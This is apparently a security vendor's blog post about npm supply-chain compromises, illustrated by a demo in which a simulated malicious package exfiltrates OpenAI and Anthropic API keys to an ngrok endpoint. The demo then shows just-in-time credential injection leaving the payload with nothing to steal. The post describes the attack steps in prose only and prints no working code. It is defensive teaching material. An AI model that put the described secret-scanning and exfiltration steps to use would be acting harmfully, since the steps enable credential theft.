Speed in modern engineering comes from reusing open-source components, but that same dependency chain has become one of the most exploited attack surfaces on the internet.
This post walks through a realistic npm supply-chain compromise, how attackers turn a poisoned package into a full-blown breach, and a clean demo that shows a practical mitigation: just-in-time secret injection.
Supply-chain compromises happen across every language ecosystem — PyPI, RubyGems, Go modules, but npm remains the most frequently targeted.
Over the past few years, we’ve seen large-scale incidents (like Shai-Hulud recently), where a malicious npm package silently spread through CI systems and exfiltrated credentials from thousands of machines. That’s why we’re using npm as our example in this post. It’s representative of how real-world supply-chain attacks unfold across any modern stack.
Every supply-chain breach starts the same way: with trust. You install a dependency, like a new logging utility or a small helper buried ten layers deep, and assume it does what it says on the tin. But a single compromised maintainer account or poisoned package version can quietly turn that trust into an entry point.
A malicious package can execute automatically during install or build-time lifecycle scripts, such as preinstall or postinstall. From there, the payload runs in the context of your CI pipeline or developer environment with all the same privileges your tools have.
That’s where the real damage happens. These payloads are rarely loud or destructive; they’re designed to blend in. Most are short, heavily obfuscated scripts that scan for secrets in environment variables, .npmrc tokens, cached SDK credentials, or local kubeconfigs. Once they find anything interesting, they exfiltrate it. Often via a single POST request to an attacker-controlled endpoint disguised as a harmless telemetry or analytics domain.
Armed with these secrets, an attacker can publish backdoored images to your container registry, or inject a hidden GitHub Actions workflow that grants long-term persistence. The poisoned package was just the initial infection, the stolen credentials are the real payload.
From there, the path is well-worn: the attacker waits for your deployment pipeline to pull their backdoored image, which eventually runs inside a Kubernetes pod with access to sensitive runtime secrets — OpenAI or Anthropic API keys, database credentials, or service tokens. Once inside, they can exfiltrate data, explore internal APIs, and move laterally across your environment.
In other words: a single malicious npm install can become a full-scale cloud breach.
Most teams already run dependency and vulnerability scanners and they absolutely should. They catch outdated packages, known CVEs, typosquats, and dangerous permissions before they ship. But scanners live in a world of known vulnerabilities. Supply-chain attacks thrive in the world of unknown behavior. By the time a signature or rule exists, the exploit has already run in thousands of build environments. Even the best scanners share a couple of unavoidable blind spots:
So even with the best coverage, a package can pass every check, execute malicious code, and leave no trace until it’s too late.
That’s why defense in depth matters. Static analysis tells you what you’re installing; runtime guardrails decide what it’s allowed to do once it runs. The rest of this post focuses on that second layer: how runtime identity and just-in-time secret injection make a compromise far less valuable for an attacker.
Once attackers get code execution, they follow a fast, repeatable playbook:
The simple lesson: if secrets are discoverable at runtime, a small compromise becomes a full breach. Remove those secrets from the attack surface and you dramatically reduce the blast radius.
Just-in-time injection means credentials aren’t baked into images, env vars, or files. They’re provisioned only to the specific process that needs them, just when it needs them. Delivery can happen in several ways: placed “on the wire” (for example, by adding headers to outbound HTTP calls), or written to an ephemeral file that’s only readable by that process.
Why this matters:
This demo shows the exact attack chain described above, and how just-in-time injection breaks it.
ngrok).At first everything looks fine. The Support-Assistant UI works as expected: you type a question, it fetches results from Postgres, asks the LLM for a summary, and returns the answer. It’s a completely ordinary helper agent, until one of its dependencies turns hostile.

A malicious npm package quietly executes during runtime and starts scanning environment variables. The screenshot below shows what happens next: our simulated payload sends the collected keys to an ngrok endpoint. The POST request includes both the OpenAI and Anthropic API keys.

The Riptides Connection Inventory page shows these outbound requests to unknown ngrok IPs. But a single successful request like this is all an attacker needs to steal API keys and escalate.

Even though the poisoned package doesn’t break the application itself, it silently opens connections and exfiltrates secrets. In a real incident, that one request would be enough to pivot deeper into your infrastructure.
Next, we strip the pod of its persistent secrets by setting the API keys to none. Now the system has nothing to leak, but the application also fails to call the LLM. In practice, you’d configure secret injection first, then remove environment variables, but here we intentionally break the app to show that the keys really are gone.

Now we turn on Riptides’ on-the-wire credential injection.
Instead of handing credentials to the environment, Riptides injects them dynamically into legitimate requests at runtime. Here’s a small configuration snippet of how it’s configured for an identity:

The app immediately resumes normal behavior without restarting pods or re-deploying images.

Finally, we check the malicious scraper again. It still executes, but now it has nothing to steal. The exfiltrated payload shows empty values: the exploit’s payoff is gone. In a real environment, that one change — removing persistent secrets and injecting them just-in-time — turns a full-scale breach into a contained event.

A poisoned npm package is a plausible, common starting point for a large breach. You can’t catch every compromised dependency, but you can make compromises far less valuable. Removing persistent runtime secrets and delivering credentials just-in-time to a verified workload identity converts a likely data breach into a contained incident. That shift — fewer secrets exposed, fewer privileges leaked, and clearer audit trails — is the kind of measurable risk reduction security teams, engineering leaders, and auditors will actually care about.
If you’re interested in other secret-injection posts, check out our examples — On‑Demand Credentials: Secretless AI Assistant (GCP) and On‑the‑Wire Credential Injection: Secretless AWS/Bedrock.